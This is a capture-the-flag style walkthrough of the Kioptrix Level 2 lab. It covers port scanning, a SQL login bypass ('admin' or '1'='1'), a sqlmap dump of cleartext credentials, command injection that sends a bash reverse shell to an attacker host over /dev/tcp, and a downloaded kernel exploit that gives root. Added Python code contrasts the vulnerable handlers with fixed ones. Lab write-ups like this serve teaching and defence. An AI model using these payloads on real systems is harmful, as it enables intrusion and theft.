
## Overview

| Name | Template |
| --- | --- |
| Release Date | 2024-02-26 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ |

## Related skills

1. File upload
2. Local file include
3. vim to shell

## Weak points

1. Wordlist building and information-gathering skills are weak

## Nmap scan

Scan all 65535 TCP ports of the target (10.10.10.19, not the local host) with nmap. `--min-rate=1000` tells nmap to send at least 1000 packets per second and `-T4` selects the aggressive timing template. `grep -oE '(^[0-9][^/tcp]*)'` picks the port number off the start of each `NNN/tcp` line and `tr '\n' ','` joins the numbers into one comma-separated string.

A caveat on that regex: `[^/tcp]*` is a character class ("any run of characters that are not `/`, `t`, `c` or `p`"), not the literal string `/tcp`. It works only because a port number never contains those characters, and it leaves a trailing comma in `$ports`, which nmap tolerated in the run below. A more exact form is `grep -oE '^[0-9]+/tcp' | cut -d/ -f1`.

```bash
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
```

Then rescan only the discovered ports with `-p$ports`: `-sV` performs service version detection, `-sC` runs the default NSE script set (which is where the SSHv1, SSLv2 and certificate findings below come from), `-O` attempts OS detection and `-oN nmap.txt` saves the normal-format output to nmap.txt.

```bash
nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
```

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.19 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 10.10.10.19 -oN nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-05 11:31 CST
Nmap scan report for 10.10.10.19
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 613/udp status
|_ 100024 1 616/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-08-05T00:22:22+00:00; -3h09m22s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
616/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -3h09m22s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.02 seconds
```

What stands out: OpenSSH 3.9p1 still accepts SSH protocol 1; Apache 2.0.52 on 443 negotiates SSLv2 with export-grade ciphers and serves a self-signed certificate that expired in 2010; CUPS 1.1 on 631 lists PUT as an allowed method; MySQL on 3306 is reachable from the network but rejects this host (`unauthorized`); and the 2.6.x kernel guess points at an old CentOS 4 image. The OS guess is flagged as unreliable because no closed port was found, and the -3h09m clock skew is worth remembering when correlating timestamps later.
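
The port-extraction pipeline above is fragile and it throws away the script findings that matter most. As an added example (not part of the original write-up), the following Python parses nmap's normal-format output exactly on the `NNN/tcp` prefix, rebuilds the `-p` port specification without the trailing comma, and makes a second pass over the NSE script lines to flag legacy services. The embedded sample is an excerpt of the scan shown above; the marker table and the function names are assumptions chosen for this example.

```python
"""Parse nmap normal (-oN) output into a port list and flag legacy services.

Added example for this page, not part of the original write-up. It does what
the write-up's `grep -oE '(^[0-9][^/tcp]*)' | tr '\\n' ','` pipeline does, but
matches the `NNN/tcp` prefix exactly instead of relying on a character class,
and adds a second pass over the NSE script lines so findings such as SSHv1 or
SSLv2 support are not lost in the noise.
"""
import re
from datetime import date

# Excerpt of the write-up's nmap output, embedded here as inline test data.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
| SSLv2 supported
|_Not valid after: 2010-10-08T00:10:47
616/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
|_ Potentially risky methods: PUT
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
"""

# A port line: "<port>/<proto> <state> <service> [version ...]".
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Substrings in NSE script output that mark a legacy or risky service
# (assumed list for this example; extend as needed).
WEAK_MARKERS = {
    "Server supports SSHv1": "SSH protocol 1 enabled",
    "SSLv2 supported": "SSLv2 enabled",
    "Potentially risky methods: PUT": "HTTP PUT allowed",
}
NOT_AFTER = re.compile(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})")


def open_ports(scan_text, proto="tcp"):
    """Open port numbers for `proto`, in the order nmap printed them."""
    ports = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(2) == proto and m.group(3) == "open":
            ports.append(int(m.group(1)))
    return ports


def port_spec(scan_text):
    """Comma-joined list for `nmap -p<spec>`, without the trailing comma the
    `tr '\\n' ','` pipeline leaves behind."""
    return ",".join(str(p) for p in open_ports(scan_text))


def weak_findings(scan_text, today=None):
    """Map each port to the weak-service labels found in its script output."""
    today = today or date.today()
    findings, current = {}, None
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = int(m.group(1))
            continue
        if current is None or not line.startswith("|"):
            continue  # script lines belong to the last port seen
        for marker, label in WEAK_MARKERS.items():
            if marker in line:
                findings.setdefault(current, []).append(label)
        m = NOT_AFTER.search(line)
        if m and date.fromisoformat(m.group(1)) < today:
            findings.setdefault(current, []).append("TLS certificate expired")
    return findings


if __name__ == "__main__":
    print("ports:", port_spec(SAMPLE_SCAN))
    for port, labels in sorted(weak_findings(SAMPLE_SCAN).items()):
        print("%d/tcp: %s" % (port, ", ".join(labels)))
```

Feed it the saved `nmap.txt` instead of `SAMPLE_SCAN` to get the same port specification the shell pipeline produces plus a per-port list of the legacy-protocol findings, which is the part of a full-port scan that usually decides where to look first.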

## Enumeration

### SMB enumeration

> Ports: 139 389 445 636

Not applicable here: the scan above shows none of these ports open on 10.10.10.19. The template commands are kept for reference.

- `enum4linux -a/-A 127.0.0.1`

```bash
$ enum4linux -A <ip>
```

### Web

> HTTP web server, ports like: 80 443 81 8080 8443 4443 8081

- Finger: obtains the list of users on a system and configuration information about a particular user

- `whatweb`: fingerprints the target site's technology stack, CMS, plugins, framework and related details by analysing the responses and page content. (The output below is from a different host, 192.168.56.101; the write-up does not show it run against 10.10.10.19.)

```bash
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.101
http://192.168.56.101 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.101], Script[text/javascript]
```

- Directory enumeration
  - `dirb http://192.168.56.101`
  - `dirsearch -u http://192.168.56.101 -r`
  - `gobuster dir -w ... -u http://192.168.56.101 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.9 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:07 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://10.10.10.9/: Get "http://10.10.10.9/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
┌──(root㉿kill3r)-[/]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.19 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.19
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,bak,html,php
[+] Timeout: 10s
===============================================================
2023/08/05 13:37:56 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 284]
/index.php (Status: 200) [Size: 667]
/manual (Status: 301) [Size: 311] [--> http://10.10.10.19/manual/]
/usage (Status: 403) [Size: 284]
/.html (Status: 403) [Size: 284]
Progress: 1102282 / 1102805 (99.95%)===============================================================
2023/08/05 13:43:45 Finished
===============================================================
```

The first run went to the wrong address (10.10.10.9) and timed out; against 10.10.10.19 gobuster finds `/index.php` (200), `/manual` (301 to `/manual/`) and `/usage` (403). Each word is also tried with every `-x` extension, which is why the medium wordlist took about six minutes even on a LAN.
- Vulnerability scanning

```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```

## Wordlists

- cewl.list: built by spidering the site with cewl (the URL here is the template's example host)

```bash
cewl http://192.168.56.101/ -w dict.txt
```

- pass.list

```plaintext
5afac8d85f
66lajGGbla
```

- user.list

```plaintext
admin
john
```

- hash.list: no entries
- information.list: no entries

## Reproduction

### Visit the target and look for functionality

Start Burp and work through the usual checklist for getting past an admin login:

1. SQL injection
2. Universal password: `admin' or '1'='1`
3. Forged access credentials
4. Weak passwords
5. Response tampering

The universal password gets into the back end, but where is the input box? Capturing the traffic in Burp brings the box out. It looks like a typical command-execution feature: it takes an IP address, so enter one and keep capturing.

- Listen on Kali: `nc -lvvp 6666`
- Send the reverse shell through the IP field; the value is handed to a shell, so a command separator after the address (for example `127.0.0.1; ...`) runs a second command: `bash -i >& /dev/tcp/10.10.10.15/6666 0>&1`
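
To make the two bugs chained above concrete, here is an added example (not code from the Kioptrix target) that models both in one runnable file: a login whose SQL is built by string concatenation, which `admin' or '1'='1` bypasses, beside a parameterised version that it does not; and a "ping" handler that interpolates the form value into a shell command line, beside a version that validates the address and runs without a shell. It uses an in-memory SQLite table seeded with the two rows sqlmap dumps later in this write-up, and `echo` stands in for `ping` so it runs offline. Function names are assumptions for illustration.

```python
"""Model of the two web bugs chained in this write-up.

Added example for this page, not code from the Kioptrix target: it replaces
the target's PHP/MySQL with an in-memory SQLite table (seeded with the two
rows sqlmap dumps later in the write-up) and swaps `ping` for `echo` so that
the command-injection part runs without network access. Function names are
assumptions for illustration.
"""
import ipaddress
import sqlite3
import subprocess


def make_db():
    """In-memory copy of webapp.users (contents taken from the sqlmap dump)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "5afac8d85f"), (2, "john", "66lajGGbla")])
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: a quote in the input closes the
    string literal and the rest of the input becomes SQL. With admin' or '1'='1
    in both fields the WHERE clause is true for every row."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s' "
           "ORDER BY id" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the same input is compared as a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=? ORDER BY id",
        (username, password)).fetchone()
    return row[0] if row else None


def ping_vulnerable(ip):
    """Target-style handler: the form value is interpolated into a shell
    command line, so `127.0.0.1; <cmd>` runs <cmd> as the web server user.
    In the write-up <cmd> is the bash reverse shell; here it is a harmless
    echo, and `echo` replaces `ping` so no network is needed."""
    result = subprocess.run("echo pinging " + ip, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def validate_ip(value):
    """Return the normalised address, or None if `value` is not a bare IP."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def ping_safe(ip):
    """Validate first, then run without a shell and with the address as its
    own argv element, so shell metacharacters never reach an interpreter."""
    addr = validate_ip(ip)
    if addr is None:
        return None
    result = subprocess.run(["echo", "pinging", addr],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable login:", login_vulnerable(db, payload, payload))
    print("safe login:", login_safe(db, payload, payload))
    print(ping_vulnerable("127.0.0.1; echo INJECTED"), end="")
    print("safe ping:", ping_safe("127.0.0.1; echo INJECTED"))
```

The two fixes are independent: parameterising the query stops the login bypass but does nothing for the ping page, and validating the address as an IP (rather than blacklisting `;`) plus dropping `shell=True` closes the command injection regardless of which separator the attacker picks.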

## Vulnerability analysis

- MySQL: unauthorized

```bash
┌──(root㉿kill3r)-[/]
└─# mysql -uroot -proot -h10.10.10.19
ERROR 1130 (HY000): Host 'kill3r.lan' is not allowed to connect to this MySQL server
```

ERROR 1130 is a host-based grant check, not a password failure: the server rejects the connecting host before authenticating, which matches nmap's `MySQL (unauthorized)`. The database therefore has to be reached through the web application instead.

- MySQL injection (sqlmap)

```bash
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 --dbs
available databases [1]:
[*] webapp
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" --tables --risk 3
Database: webapp
[1 table]
+-------+
| users |
+-------+
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" --columns
Database: webapp
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
┌──(root㉿kill3r)-[/opt]
└─# sqlmap -r sql_InJect.txt --level 5 --risk 3 -D "webapp" -T "users" -C "id,username,password" --dump
Database: webapp
Table: users
[2 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | admin | 5afac8d85f |
| 2 | john | 66lajGGbla |
+----+----------+------------+
```

sqlmap is run against a saved raw HTTP request (`-r sql_InJect.txt`); `--level 5 --risk 3` enables every test payload, including the OR-based ones that can modify data if the injected query is an UPDATE or DELETE, so use them with care outside a lab. It enumerates the single `webapp` database, its `users` table and two rows. Both passwords are stored in clear text; they are the entries in pass.list above.

## Privilege escalation

- Searching for SUID binaries: nothing useful, the list is the stock set that ships with CentOS 4

```bash
bash-3.00$ find / -perm -u=s -type f 2>/dev/null
/sbin/unix_chkpwd
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/usr/sbin/ccreds_validate
/usr/sbin/userhelper
/usr/sbin/userisdnctl
/usr/sbin/suexec
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/kerberos/bin/ksu
/usr/lib/squid/pam_auth
/usr/lib/squid/ncsa_auth
/usr/bin/chsh
/usr/bin/rcp
/usr/bin/sudo
/usr/bin/chage
/usr/bin/crontab
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/lppasswd
/usr/bin/sg
/usr/bin/passwd
/bin/mount
/bin/traceroute6
/bin/traceroute
/bin/umount
/bin/ping6
/bin/ping
/bin/su
```
- Viewing crontab

```bash
bash-3.00$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
```

Only the default run-parts entries; nothing custom to hijack.
- Viewing the OS and kernel version

```bash
bash-3.00$ cat /etc/*release*
cat: /etc/lsb-release.d: Is a directory
CentOS release 4.5 (Final)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
```

CentOS 4.5 on a 32-bit 2.6.9-55.EL kernel built in 2007. Search Exploit-DB from Kali for a matching local root exploit:

```bash
┌──(root㉿kill3r)-[/opt]
└─# searchsploit centos 2.6
----------------------------------------------------------------------------- --------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- --------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 /   | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / Ce | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Esca | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mu | linux_x86-64/local/45516.c
----------------------------------------------------------------------------- --------------------------
Shellcodes: No Results
Papers: No Results
```

Of these, 25444.c (kernels 2.6.32 and later) and 45516.c (x64 only) cannot apply to a 2.6.9 i686 kernel; 9545.c, 9479.c and 9542.c all target 2.4/2.6 kernels of this era, and 9545.c is the one tried below.
- Exploit

```bash
┌──(root㉿kill3r)-[/opt]
└─# searchsploit -m 9545.c
┌──(root㉿kill3r)-[/opt/vulnhub]
└─# python3 -m http.server 8888
bash-3.00$ cd /tmp
bash-3.00$ wget http://10.10.10.15:8888/9545.c
--21:49:13-- http://10.10.10.15:8888/9545.c
=> `25444.c'
Connecting to 10.10.10.15:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/x-csrc]
0K ......... 100% 1.25 GB/s
21:51:48 (1.25 GB/s) - `9545.c' saved [9408/9408]
bash-3.00$ gcc 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
```

`searchsploit -m` copies the exploit source into the current directory. It is served from Kali (10.10.10.15) with Python's built-in HTTP server, fetched with wget into /tmp on the target, compiled with the target's own gcc and run; the "no newline at end of file" warning is harmless. The resulting shell is uid 0 while the supplementary group is still 48 (apache), the account the reverse shell from the web application ran as.

## Shell as user1

## Shell as user2

Not applicable on this box: the reverse shell from the web application runs as apache and the kernel exploit goes straight to root.

## Shell as root

> Save a screenshot as the flag or proof